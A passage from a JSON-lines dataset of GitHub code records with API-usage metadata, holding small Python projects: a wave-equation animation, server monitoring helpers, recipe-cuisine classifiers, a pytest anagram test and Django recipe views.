"call"}, {"api_name": "datetime.datetime", "line_number": 585, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 586, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 586, "usage_type": "name"}, {"api_name": "mappings.map_unitType_inv", "line_number": 607, "usage_type": "argument"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 609, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 617, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 617, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 618, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 618, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 630, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 646, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 668, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 691, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 691, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 692, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 692, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 712, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 718, "usage_type": "call"}, {"api_name": "mappings.map_account_type_inv", "line_number": 766, "usage_type": "argument"}, {"api_name": "pandas.notnull", "line_number": 770, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 788, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 790, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 794, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 801, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 801, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 802, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 802, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 822, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 838, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 838, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 839, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 839, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 842, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 846, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 872, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 888, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 888, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 889, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 889, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 907, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 908, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 911, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 917, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 918, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 951, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 951, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 952, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 952, "usage_type": "name"}, {"api_name": "mappings.export_mappings", "line_number": 969, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 970, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 971, "usage_type": "call"}, {"api_name": "os.path", "line_number": 971, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 972, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 976, "usage_type": "call"}, {"api_name": "os.path", "line_number": 976, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 977, "usage_type": "call"}]} +{"seq_id": "35689820992", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndata = np.loadtxt(\"datos.dat\")\nz=np.zeros(100)\nx=0\n\nfor i in range(len(data)):\n if((i%100)==0 and i!=0):\n z[i%100]=0\n z[(i-1)%100]=0\n plt.title('Ecuacion de onda')\n plt.ylabel('u')\n plt.xlabel('x')\n plt.plot(z,color='g')\n plt.ylim((-2,2))\n plt.savefig(str(x))\n plt.close()\n x+=1\n else:\n z[i%100]=data[i]\n \nos.system('convert -delay 100 -loop 0 *.png cuerda.gif') \n\n", "repo_name": "mlaguna10/MateoLaguna_hw4", "sub_path": "Punto_2/animacion.py", "file_name": "animacion.py", "file_ext": "py", "file_size_in_byte": 516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.loadtxt", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "os.system", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "72477992804", "text": "# -*- encoding: utf-8 -*-\n\n\"\"\"\ntankmanager.helpers\n~~~~~~~~~~~~~~~~~~~\n\nCommon for whole app functions.\n\"\"\"\nimport os\nfrom pwd import getpwuid\nimport commands\nimport multiprocessing\n\n\ndef owner_by_path(path):\n return getpwuid(os.stat(path).st_uid).pw_name\n\n\ndef get_usage_fire(lock_pth='/var/lock'):\n is_busy = False\n locks = []\n os.chdir(lock_pth)\n for f in os.listdir('.'):\n if f.startswith('lunapark_') and f.endswith('.lock'):\n is_busy = True\n locks.append({\n 'file_name': f,\n 'created_at': os.path.getmtime(f),\n 'owner': owner_by_path(f),\n })\n return {'is_busy': is_busy, 'locks': locks}\n\n\ndef get_usage_cpu():\n result = dict(zip(['1m', '5m', '15m'], os.getloadavg()))\n result['cores_num'] = multiprocessing.cpu_count()\n return result\n\n\ndef get_usage_disk(path='/home', rec=10):\n result = {}\n retcode, du = commands.getstatusoutput(\\\n 'du -csk %s/* 2>/dev/null | sort -r -n' % path)\n for line in du.split('\\n')[:rec + 1]:\n splt = line.split()\n result[splt[1]] = splt[0]\n return result\n\n\ndef get_hops(fqdn):\n retcode, mtr_stdout = commands.getstatusoutput(\\\n 'mtr --report --report-cycles 1 %s' % str(fqdn))\n\n hops = [h.split()[1] for h in mtr_stdout.split('\\n')[1:]]\n\n result = {\n 'hops': hops,\n 'hops_num': len(hops)\n }\n return result\n", "repo_name": "greggyNapalm/firebat-manager", "sub_path": "firemanager/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1418, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pwd.getpwuid", "line_number": 16, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 16, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.getmtime", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.getloadavg", "line_number": 35, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 36, "usage_type": "call"}, {"api_name": "commands.getstatusoutput", "line_number": 42, "usage_type": "call"}, {"api_name": "commands.getstatusoutput", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "35030878673", "text": "from conf.conf import logging\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom conf.conf import settings\nfrom connector.connector import get_data\n\n\ndef replace_with_mean(in_data, col_name):\n a = in_data.groupby([col_name])[settings.TARGET].mean().sort_values(ascending=False)\n mean_dict = a.to_dict()\n in_data[f'{col_name}_mean'] = in_data[col_name].map(mean_dict)\n in_data = in_data.drop([col_name], axis=1)\n return in_data\n\ndef intersection(lst1: list, lst2: list) -> list:\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\ndef get_train_data(test_size: int):\n data = get_data()[settings.FEATURES]\n categorical_features = ['Ship Mode', 'Segment', 'City', 'State', 'Region', 'Category', 'Sub-Category']\n categorical_features = intersection(settings.FEATURES, categorical_features)\n logging.info(f\"Generating train&test data with test_size={test_size}\")\n data_mean = data\n for i in categorical_features:\n data_mean = replace_with_mean(data_mean, i)\n logging.debug(data_mean.head())\n\n train_data_mean, test_data_mean = train_test_split(data_mean, test_size=test_size, random_state=settings.SEED)\n logging.debug(f\"Train dataset shape: {train_data_mean.shape}\")\n logging.debug(f\"Test dataset shape: {test_data_mean.shape}\")\n\n\n X_train_mean = train_data_mean.loc[:, train_data_mean.columns != settings.TARGET]\n y_train_mean = train_data_mean.loc[:, train_data_mean.columns == settings.TARGET]\n X_test_mean = test_data_mean.loc[:, test_data_mean.columns != settings.TARGET]\n y_test_mean = test_data_mean.loc[:, test_data_mean.columns == settings.TARGET]\n\n return X_train_mean, y_train_mean, X_test_mean, y_test_mean\n\n", "repo_name": "antsareva/model_runner", "sub_path": "model/data_clearing_transformation.py", "file_name": "data_clearing_transformation.py", "file_ext": "py", "file_size_in_byte": 1729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "conf.conf.settings.TARGET", "line_number": 9, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 9, "usage_type": "name"}, {"api_name": "connector.connector.get_data", "line_number": 20, "usage_type": "call"}, {"api_name": "conf.conf.settings.FEATURES", "line_number": 20, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "conf.conf.settings.FEATURES", "line_number": 22, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "conf.conf.logging.info", "line_number": 23, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 23, "usage_type": "name"}, {"api_name": "conf.conf.logging.debug", "line_number": 27, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 29, "usage_type": "call"}, {"api_name": "conf.conf.settings.SEED", "line_number": 29, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 29, "usage_type": "name"}, {"api_name": "conf.conf.logging.debug", "line_number": 30, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 30, "usage_type": "name"}, {"api_name": "conf.conf.logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "conf.conf.logging", "line_number": 31, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 34, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 34, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 35, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 36, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 36, "usage_type": "name"}, {"api_name": "conf.conf.settings.TARGET", "line_number": 37, "usage_type": "attribute"}, {"api_name": "conf.conf.settings", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "6950025082", "text": "from ....problems.Arrays_and_Hashing.Valid_Anagram import Solution\nfrom hypothesis.strategies import from_regex, composite\nfrom hypothesis import given\nfrom collections import Counter\nimport pytest\n\n\n@composite\ndef get_params(draw):\n s = draw(from_regex(\"^[a-z]+$\", fullmatch=True))\n t = draw(from_regex(\"^[a-z]+$\", fullmatch=True))\n expected = Counter(s) == Counter(t)\n\n return [s, t, expected]\n\n\n@pytest.mark.parametrize(\n \"s, t, expected\",\n [\n (\"anagram\", \"nagaram\", True),\n (\"rat\", \"car\", False),\n (\"red\", \"de\", False),\n (\"hi\", \"hello\", False),\n ],\n)\ndef test_is_anagram_parametrize(s: str, t: str, expected: bool) -> None:\n test = Solution()\n\n assert test.isAnagram(s, t) == expected\n\n\n@given(get_params())\ndef test_is_anagram_strategies(params: list) -> None:\n s = params[0]\n t = params[1]\n expected = params[2]\n print(params)\n test = Solution()\n\n assert test.isAnagram(s, t) == expected\n", "repo_name": "LuisAPC/pytest_with_Leetcode", "sub_path": "tests/problems/Arrays_and_Hashing/test_Valid_Anagram.py", "file_name": "test_Valid_Anagram.py", "file_ext": "py", "file_size_in_byte": 967, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hypothesis.strategies.from_regex", "line_number": 10, "usage_type": "call"}, {"api_name": "hypothesis.strategies.from_regex", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 12, "usage_type": "call"}, {"api_name": "hypothesis.strategies.composite", "line_number": 8, "usage_type": "name"}, {"api_name": "problems.Arrays_and_Hashing.Valid_Anagram.Solution", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 17, "usage_type": "attribute"}, {"api_name": "problems.Arrays_and_Hashing.Valid_Anagram.Solution", "line_number": 38, "usage_type": "call"}, {"api_name": "hypothesis.given", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "33420620555", "text": "# -*- coding: utf-8 -*-\n\nimport importlib\nimport argparse\nimport logging\nimport sys\n\nfrom etutorservice.utils.config_helper import config\nfrom etutorservice.utils.thrift_helper import create_multiplexed_server\nfrom etutorservice.common.db import (\n db_session_manager as session_manager,\n redis_manager,\n)\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser('run tutor service or commands')\n parser.add_argument('-c', '--config', dest='config_file', required=True,\n help='config file path')\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-r', '--runservice', action='store_true',\n dest='run_service')\n group.add_argument('-e', '--exec', dest='command_name',\n help='exec command name')\n parser.add_argument('command_args', nargs='*',\n help='sub command args')\n return parser.parse_args()\n\ndef _run_sub_command(command_name, command_args):\n try:\n command_module = importlib.import_module(\n 'etutorservice.jobs.%s' % command_name)\n command_module.run(command_args)\n except ImportError as e:\n print('the command %s not found' % e.message)\n\n\ndef _init_logging_setting():\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n\ndef main():\n logger = _init_logging_setting()\n\n args = _parse_args()\n\n config.load_config_file(args.config_file)\n\n session_manager.register_db(config.data['mysql_db']['tutor'], 'default')\n # redis_manager.register_db(config.data['redis_db'], config.data['redis_server'])\n\n if args.run_service:\n logger.info('service start')\n elif args.command_name:\n logger.info('command start')\n _run_sub_command(args.command_name, args.command_args)\n else:\n print('args not valid')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "wangbaliang/auto_app_test", "sub_path": "__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 2126, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 43, "usage_type": "call"}, {"api_name": "etutorservice.utils.config_helper.config.load_config_file", "line_number": 54, "usage_type": "call"}, {"api_name": "etutorservice.utils.config_helper.config", "line_number": 54, "usage_type": "name"}, {"api_name": "etutorservice.common.db.db_session_manager.register_db", "line_number": 56, "usage_type": "call"}, {"api_name": "etutorservice.common.db.db_session_manager", "line_number": 56, "usage_type": "name"}, {"api_name": "etutorservice.utils.config_helper.config.data", "line_number": 56, "usage_type": "attribute"}, {"api_name": "etutorservice.utils.config_helper.config", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "73313397926", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 2 21:17:17 2018\n\n@author: yinglirao\n\"\"\"\n\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport scipy\n\ndef load_data(data_path):\n print('Loading data...')\n with open(data_path, 'r') as f:\n data = json.load(f)\n return data\n\ndef extract_data(data, flag=None):\n ingredients = [line['ingredients'] for line in data]\n ingredients =[' '.join(i) for i in ingredients] #convert lists of words to sentences\n if flag == 'test':\n return np.asarray(ingredients)\n else:\n cuisine = [line['cuisine'] for line in data]\n le = LabelEncoder()\n labels = le.fit_transform(cuisine) #convert cuisine to categorical labels\n return np.asarray(ingredients), labels, le\n\ndef tfidf_transform(ingredients): \n tfidf = TfidfVectorizer(min_df=5, binary=True,\n ngram_range=(1, 2), stop_words='english')\n features = tfidf.fit_transform(ingredients)\n return features, tfidf\n\ndef create_dataset(error_sample_list, train_cuisine):\n new_x = np.empty((0, features.shape[1]))\n new_y = []\n for i in error_sample_list:\n new_x = scipy.sparse.vstack((new_x, x_train[train_cuisine==i]))\n new_y.extend(y_train[train_cuisine==i])\n return new_x, new_y\n\ndef create_new_testset(error_sample_list, pred_cuisine):\n x_new_test = np.empty((0, features.shape[1]))\n for i in error_sample_list:\n x_new_test = scipy.sparse.vstack((x_new_test, x_test[pred_cuisine==i]))\n return x_new_test\n\ndef update_ypreds(pred, error_sample_list,pred_cuisine,pred_origin):\n y_idx = 0\n for name in error_sample_list:\n check_idx = pred_cuisine==name\n for index, boolean in enumerate(check_idx):\n if boolean:\n pred_origin[index] = pred[y_idx]\n y_idx+=1\n return pred_origin\n\ndef model_correction(x_train, y_train, x_test, y_test):\n error_sample_lists = [['french', 'italian', 'southern_us'],\n ['british', 'irish', 'french','southern_us'],\n ['mexican','moroccan', 'spanish','greek'],\n ['thai','indian', 'vietnamese'],\n ['southern_us','italian'],\n ['greek', 'british', 'spanish', 'irish','french','russian'],\n ['japanese', 'chinese', 'filipino','korean','vietnamese']]\n models = [None]*len(error_sample_lists)\n preds = [None]*len(error_sample_lists)\n train_cuisine = le.inverse_transform(y_train)\n model_origin = LogisticRegression(random_state=0, penalty='l2', C=10)\n model_origin.fit(x_train, y_train)\n pred_origin = model_origin.predict(x_test)\n pred_cuisine = le.inverse_transform(pred_origin)\n \n for i in range(len(error_sample_lists)):\n models[i] = LogisticRegression(random_state=0, penalty='l2', C=10)\n new_x, new_y = create_dataset(error_sample_lists[i], train_cuisine)\n models[i].fit(new_x, new_y)\n test_new_x = create_new_testset(error_sample_lists[i], pred_cuisine)\n preds[i] = models[i].predict(test_new_x)\n pred_origin=update_ypreds(preds[i], error_sample_lists[i], pred_cuisine, pred_origin) \n score = (pred_origin == y_test).sum()/len(y_test) \n return pred_origin, score\n\ndata = load_data('../input/train.json')\ningredients, labels, le = extract_data(data)\nfeatures, tfidf = tfidf_transform(ingredients)\nkf = KFold(n_splits=4)\nscore = np.zeros((1,4)).ravel()\nfor i, (train_idx, test_idx) in enumerate(kf.split(features)):\n print('train...')\n x_train, y_train = features[train_idx], labels[train_idx]\n x_test, y_test = features[test_idx], labels[test_idx]\n _, score[i] = model_correction(x_train, y_train, x_test, y_test)\n# model=LogisticRegression(random_state=0, penalty='l2', C=10) #for logistic regression\n# model.fit(x_train, y_train) #for logistic regression\n# score[i]=model.score(x_test, y_test) #for logistic regression\n print(score[i]) \nprint('average cross validation sccore is: %.5f'%score.mean()) \n#0.78551 for model_correction\n#0.78506 for base model LG C=10, l2 penalty\n#0.78795 with logistic regression twice\n \n\n ", "repo_name": "dafeii17/kaggle-food-project", "sub_path": "models/regression+correction.py", "file_name": "regression+correction.py", "file_ext": "py", "file_size_in_byte": 4369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 41, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.sparse.vstack", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "10666510342", "text": "from django.shortcuts import render, get_object_or_404,redirect\nfrom .models import Recipes, UserRecipe\nfrom accounts.models import UserProfile\nfrom category.models import Category\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.db.models import Q\n\n# Create your views here.\ndef all_recipes(request, category_slug=None):\n categories = None\n recipes = None\n\n if category_slug != None:\n categories = get_object_or_404(Category, slug=category_slug)\n recipes = Recipes.objects.filter(category=categories)\n else:\n recipes = Recipes.objects.all()\n \n paginator = Paginator(recipes,15)\n page = request.GET.get('page')\n paged_recipes = paginator.get_page(page)\n context={\n 'recipes' : paged_recipes\n }\n return render(request, 'recipe/all_recipes.html', context)\n\n\ndef recipe_detail(request,id):\n recipe = Recipes.objects.get(id=id)\n\n similar_recipes =[]\n\n x = range(int(id)+1, int(id)+5)\n for n in x: \n similar_recipes.append(Recipes.objects.get(id=str(n)))\n\n ingredients_list = recipe.ingredients.split(',')\n nutritions_list = recipe.nutrition.split(',')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients_list,\n 'nutritions': nutritions_list,\n 'similar': similar_recipes,\n }\n return render(request, 'recipe/recipe_detail.html', context)\n\ndef upload_recipe(request):\n userprofile = get_object_or_404(UserProfile, user=request.user)\n\n if request.method == 'POST':\n recipe_name = request.POST['recipe_name']\n prep_time = request.POST['prep_time']\n cook_time = request.POST['cook_time']\n total_time = request.POST['total_time']\n servings = request.POST['servings']\n yields = request.POST['yields']\n ingredients = request.POST['ingredients']\n directions = request.POST['directions']\n cuisine_path = request.POST['cuisine_path']\n nutrition = request.POST['nutrition']\n img_src = request.FILES['img_src']\n category_id = request.POST['category_id']\n\n \n\n new_recipe = UserRecipe.objects.create(\n user_id = userprofile.user_id,\n recipe_name = recipe_name,\n prep_time = prep_time,\n cook_time = cook_time,\n total_time= total_time,\n servings= servings,\n yields = yields,\n ingredients = ingredients,\n directions = directions,\n cuisine_path = cuisine_path,\n nutrition= nutrition,\n img_src = img_src,\n category_id = category_id,\n )\n new_recipe.save()\n\n return redirect('profile')\n else:\n return render(request, 'recipe/upload_recipe.html')\n \n\ndef user_recipes(request, category_slug=None):\n categories = None\n recipes = None\n\n if category_slug != None:\n categories = get_object_or_404(Category, slug=category_slug)\n recipes = UserRecipe.objects.filter(category=categories)\n else:\n recipes = UserRecipe.objects.all()\n \n context={\n 'recipes' : recipes\n }\n\n return render(request, 'recipe/user_recipes.html', context)\n\ndef user_recipe_detail(request,id):\n recipe = UserRecipe.objects.get(id=id)\n userprofile = get_object_or_404(UserProfile, user_id=recipe.user_id)\n\n other_recips = UserRecipe.objects.filter(user_id=recipe.user_id)\n # for recipes in other_recips:\n # if recipes.id == id:\n # other_recips.remove()\n\n ingredients_list = recipe.ingredients.split(',')\n nutritions_list = recipe.nutrition.split(',')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients_list,\n 'nutritions': nutritions_list,\n 'userprofile': userprofile,\n 'other_recipes_by_user': other_recips,\n }\n return render(request, 'recipe/user_recipe_detail.html', context)\n\ndef search(request):\n if 'keyword' in request.GET:\n keyword = request.GET['keyword']\n if keyword:\n recipes = Recipes.objects.order_by('-rating').filter(Q(recipe_name__icontains=keyword) | Q(ingredients__icontains=keyword))\n recipes_count = recipes.count()\n\n paginator = Paginator(recipes,15)\n page = request.GET.get('page')\n paged_recipes = paginator.get_page(page)\n context={\n 'recipes': paged_recipes,\n 'recipes_count': recipes_count,\n 'keyword': keyword,\n }\n return render(request, 'recipe/all_recipes.html', context)", "repo_name": "prajval2000/recipeshare", "sub_path": "recipes/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 15, "usage_type": "call"}, {"api_name": "category.models.Category", "line_number": 15, "usage_type": "argument"}, {"api_name": "models.Recipes.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Recipes.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 18, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Recipes.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Recipes.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 49, "usage_type": "call"}, {"api_name": "accounts.models.UserProfile", "line_number": 49, "usage_type": "argument"}, {"api_name": "models.UserRecipe.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 67, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 86, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 94, "usage_type": "call"}, {"api_name": "category.models.Category", "line_number": 94, "usage_type": "argument"}, {"api_name": "models.UserRecipe.objects.filter", "line_number": 95, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 95, "usage_type": "name"}, {"api_name": "models.UserRecipe.objects.all", "line_number": 97, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 103, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 107, "usage_type": "call"}, {"api_name": "accounts.models.UserProfile", "line_number": 107, "usage_type": "argument"}, {"api_name": "models.UserRecipe.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.UserRecipe.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.UserRecipe", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Recipes.objects.order_by", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Recipes.objects", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.Recipes", "line_number": 129, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 129, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 132, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}]} 